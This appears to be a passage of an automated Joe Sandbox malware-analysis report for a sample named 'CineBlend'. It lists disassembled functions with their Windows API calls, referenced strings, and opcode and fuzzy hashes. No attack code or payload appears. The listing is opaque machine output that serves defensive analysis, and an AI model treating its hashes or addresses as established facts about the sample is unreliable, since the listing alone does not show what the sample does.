Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 827f8a6e42d1d7c4c2d6925ab6bba903d2b7c2750059279e9b8f8d2c56702d62
Instruction ID: 4544698d3937769bbb854184071cb115a9ada0e2e39bd8fdf9c57bcbd99bc5b8
Opcode Fuzzy Hash: 827f8a6e42d1d7c4c2d6925ab6bba903d2b7c2750059279e9b8f8d2c56702d62
Instruction Fuzzy Hash: 6C419F71E002199FCB04DFA8C885EAEBBF5FF59364F1440ADE506AB251EB719D81CB90

Function 00BBDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BBDB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BBDB7F

Strings

|, xrefs: 00BBDB50

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 1e771bdcc11bd3ad0674e855d085b9a3629d0a7db6c43abfab1dbf9d80bd5323
Instruction ID: f2c7d0b5127393c74d21ffbedede3f9c6fd71578bf29410d5fc55e4e30be9504
Opcode Fuzzy Hash: 1e771bdcc11bd3ad0674e855d085b9a3629d0a7db6c43abfab1dbf9d80bd5323
Instruction Fuzzy Hash: 79315C71801119ABCF15DFA4CC85EEEBFF9FF04304F1000A9F919A6262EB759A16DB50

Function 00BD4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00BD40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD40F8

Strings

static, xrefs: 00BD4058

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e518e16636533fde6a5cb04421d2a91978a3e185b58684901bfe33af4781be07
Instruction ID: 324adc9e9f1f45db5399b14c541fbac7c25efb93730d4242dcc732be3cabbabe
Opcode Fuzzy Hash: e518e16636533fde6a5cb04421d2a91978a3e185b58684901bfe33af4781be07
Instruction Fuzzy Hash: 96316171110604ABDB149F68CC80BFBB7E9FF48714F00865AF99587290EB71AC41DB60

Function 00BD4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BD50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD50D2

Strings

', xrefs: 00BD502C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f2e57f97c6ed13bb6982206e06ce6dd36f4bef5eff2347bba65cd4f679e1e0af
Instruction ID: 753f5e7aa7801927c82904dd015768788a114502f8cf54d79f015bc431dbc45b
Opcode Fuzzy Hash: f2e57f97c6ed13bb6982206e06ce6dd36f4bef5eff2347bba65cd4f679e1e0af
Instruction Fuzzy Hash: 0431F874A0160A9FDB24CF69C990BDEBBF5FF49300F1040AAE904AB351E771A945CF90

Function 00BD3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD3D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD3D23

Strings

Combobox, xrefs: 00BD3CE5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 1b69f39fce17009a14d1dbf4869193589d15a4235e1f7fb8dd3a23cc10790773
Instruction ID: bdaf27db52c5b923f6dacdd1ea975d4448cc923a9567c12b232935d73924b04f
Opcode Fuzzy Hash: 1b69f39fce17009a14d1dbf4869193589d15a4235e1f7fb8dd3a23cc10790773
Instruction Fuzzy Hash: B211E2717102086FEF118F14DC80FEBBBEBEB887A4F144166F918A7391E6719D518BA1

Function 00BD41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
Part of subcall function 00B47873: GetStockObject.GDI32(00000011), ref: 00B478C5
Part of subcall function 00B47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF

GetWindowRect.USER32(00000000,?), ref: 00BD4216
GetSysColor.USER32(00000012), ref: 00BD4230

Strings

static, xrefs: 00BD41F3

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 12bde0b4ff391af42bd1ca2a3132e4c4c0ba7629d24e32e097eab7b302280f9d
Instruction ID: 6da9c139bec657dd927eb9c3d21cf432fc688d035b4010eb4bf4015ec0638a13
Opcode Fuzzy Hash: 12bde0b4ff391af42bd1ca2a3132e4c4c0ba7629d24e32e097eab7b302280f9d
Instruction Fuzzy Hash: D711F972620209AFDB01DFA8DC45AEABBF8EB08314F014965F995D3250E775E851DB60

Function 00BBD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BBD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BBD7EB

Strings

<local>, xrefs: 00BBD7AB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 5b752216f820c2afd0b5159532c05d42363c769a9e1cd78c9e33f77dc8adefa8
Instruction ID: 08bc53e41e2b89c887a39b2de199516aa3fce39db10b27d71218dfe245935279
Opcode Fuzzy Hash: 5b752216f820c2afd0b5159532c05d42363c769a9e1cd78c9e33f77dc8adefa8
Instruction Fuzzy Hash: EB1106712126327BD7344B638C85FF7BFDCEB127A4F104266B50983080EAA89C40C6F0

Function 00BA75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

CharUpperBuffW.USER32(?,?,?), ref: 00BA761D
_wcslen.LIBCMT ref: 00BA7629

Strings

STOP, xrefs: 00BA7623, 00BA7628

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 5da89b5eeb71496248562a512d026aaeedf53a6e22fb6bcf66c487ab987a3682
Instruction ID: beed69cda1fa9b3b39d60c959584eaf17a371f8795a191d9e8f8feb5a6bc120a
Opcode Fuzzy Hash: 5da89b5eeb71496248562a512d026aaeedf53a6e22fb6bcf66c487ab987a3682
Instruction Fuzzy Hash: B601C032A4C9278BCB20AEBDDC90ABF77F5EF62750B4005A4E42193295EF31D900D690

Function 00BA262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA2699

Strings

ComboBox, xrefs: 00BA2638
ListBox, xrefs: 00BA2663

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d31de549385634c3348084c6a0e524c695d502b9e685b9793383760d90345e7c
Instruction ID: 6295f11ee5d4041b7ba83b6126a8adbe7becca1895e798f5c4ab4e20242bc7a4
Opcode Fuzzy Hash: d31de549385634c3348084c6a0e524c695d502b9e685b9793383760d90345e7c
Instruction Fuzzy Hash: BB01F575A06114ABCB08AB68CC51CFE73F4EF97310B0006A9A872972C1DB31990CDA50

Function 00BA2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA2593

Strings

ComboBox, xrefs: 00BA2532
ListBox, xrefs: 00BA255D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ec9451ac158ced871a1b6a83a4f9942b719e799c207e87d1f1897ea528e8593e
Instruction ID: be4b142c9b6b7e15c46d63b739c38e634093cfd8ab4930bb12d9acaa3bd10d42
Opcode Fuzzy Hash: ec9451ac158ced871a1b6a83a4f9942b719e799c207e87d1f1897ea528e8593e
Instruction Fuzzy Hash: BA01F775E441046BDB04EB94C966DFE73E8EF66340F5000AAB902A32C1DB50DF0CEAB1

Function 00BA25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA2615

Strings

ComboBox, xrefs: 00BA25B6
ListBox, xrefs: 00BA25E1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0dc7a034083cec35dbdcd4b5f22a8488853187324f72a89530da299013c95683
Instruction ID: bd0ff95c436f4e6b6e8024e2d1b8304545a3b9e769b6e0faf016b3c80da7f0a8
Opcode Fuzzy Hash: 0dc7a034083cec35dbdcd4b5f22a8488853187324f72a89530da299013c95683
Instruction Fuzzy Hash: 9201A275E4910467CB05EBA8D951EFE77E8DB16740F5000A6B902A3281DB61CE08E6B2

Function 00BA26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00BA2720

Strings

ComboBox, xrefs: 00BA26C2
ListBox, xrefs: 00BA26ED

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4c7fcf38cc85dddd3d0cc75c808a5da588cd64582846da01841332442176d0c2
Instruction ID: 81e2807e6628a96a8810292a59480668e7588780dc4e5146ccf4f14c8794141a
Opcode Fuzzy Hash: 4c7fcf38cc85dddd3d0cc75c808a5da588cd64582846da01841332442176d0c2
Instruction Fuzzy Hash: 09F0F475E4421467CB04ABA88C51FFE73F8EF12740F4009A6B962A32C1DB609E0CD660

Function 00BA1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BA146F

Strings

Error allocating memory., xrefs: 00BA1468
AutoIt, xrefs: 00BA1463

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 8c65b4f0f4b9a725bb7bbd1338f602cf4b2cd24170d2ab3c542e54d38eaa948a
Instruction ID: cc5c2a4849a59131bc796e9eca98f3bbb6d99c5895bef376633cff5a48e94d59
Opcode Fuzzy Hash: 8c65b4f0f4b9a725bb7bbd1338f602cf4b2cd24170d2ab3c542e54d38eaa948a
Instruction Fuzzy Hash: F6E0D83228931436D2243799AC03F89B6C88F06B51F1148ABF7C8655C29EF7245042D9

Function 00B9E778 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(5600C086,?), ref: 00B9E797
FreeLibrary.KERNEL32 ref: 00B9E7BD

Strings

X64, xrefs: 00B9E680

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: X64
API String ID: 3013587201-893830106
Opcode ID: cdfce18bb0ca662813cb7c5b5b83418760de59307d3666818e3cf16a92877a22
Instruction ID: a8f9a9d5303c2d335222f17d80bc70c16a160d42ee5fd856a47f0aa7ca9e9be5
Opcode Fuzzy Hash: cdfce18bb0ca662813cb7c5b5b83418760de59307d3666818e3cf16a92877a22
Instruction Fuzzy Hash: 80E02BB1805505CBEB3597604C88FA877A8AF21701F5205F9F962F3021EF31C888CB44

Function 00B610B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B5FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B610E2,?,?,?,00B4100A), ref: 00B5FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00B4100A), ref: 00B610E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B4100A), ref: 00B610F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B610F0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: b4b55c4113ba20bcf55b725c9ed04ed5bc4fbf2b32573ddf42e1907d81dd538f
Instruction ID: d1730f24fdb9aeae6eaefdabd4054803943caeaf4729ca2fdb31b762e67b6c85
Opcode Fuzzy Hash: b4b55c4113ba20bcf55b725c9ed04ed5bc4fbf2b32573ddf42e1907d81dd538f
Instruction Fuzzy Hash: CBE06D706003918BD320AF39E815742BBE8EB04305F048DADE886C3251EFB8D484CB91

Function 00BB39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00BB39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00BB3A05

Strings

aut, xrefs: 00BB39F9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 28d242725f13ae7277736db472c99387ce1f5911a94caf8dbeca25411ae24d2c
Instruction ID: f7e608094e10511021c5577311c44fdcce5473ccec907ac3105ac20675104ef0
Opcode Fuzzy Hash: 28d242725f13ae7277736db472c99387ce1f5911a94caf8dbeca25411ae24d2c
Instruction Fuzzy Hash: D3D05B7150131477DA209754DC0DFCB7B6CDB44710F0002A1BA95920D1EEF0D545C790

Function 00BD2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD2DDB

Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A

Strings

Shell_TrayWnd, xrefs: 00BD2DC1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0adada234513cd243d2368dd364f1bf40e850da707bf10b17f8e539915306d3a
Instruction ID: 0ac1bb1e16b940ca94e291623bdbeb083cf6a4ef3916918b1d1ba8f3d1c30fa1
Opcode Fuzzy Hash: 0adada234513cd243d2368dd364f1bf40e850da707bf10b17f8e539915306d3a
Instruction Fuzzy Hash: 89D0223538A300B7E228B370AC1FFE6BB54EF10B00F1008767389AB0C0DCE0A800C680

Function 00BD2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD2E08
PostMessageW.USER32(00000000), ref: 00BD2E0F

Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A

Strings

Shell_TrayWnd, xrefs: 00BD2E01

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 579ab168f87c2d779da9cca382ce25eec403ae9ab30223848ee4b0418d2a0dcc
Instruction ID: 6b8e300c49b95dc27a06a15452ce207a05b0c9b6719eff7855146d384eb0178d
Opcode Fuzzy Hash: 579ab168f87c2d779da9cca382ce25eec403ae9ab30223848ee4b0418d2a0dcc
Instruction Fuzzy Hash: 99D0A93138A3006AE228A370AC0BFD6AB54AB10B00F1008667285AB0C0D8A0A800C684

Function 00B7C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B7C213
GetLastError.KERNEL32 ref: 00B7C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B7C27C

Memory Dump Source

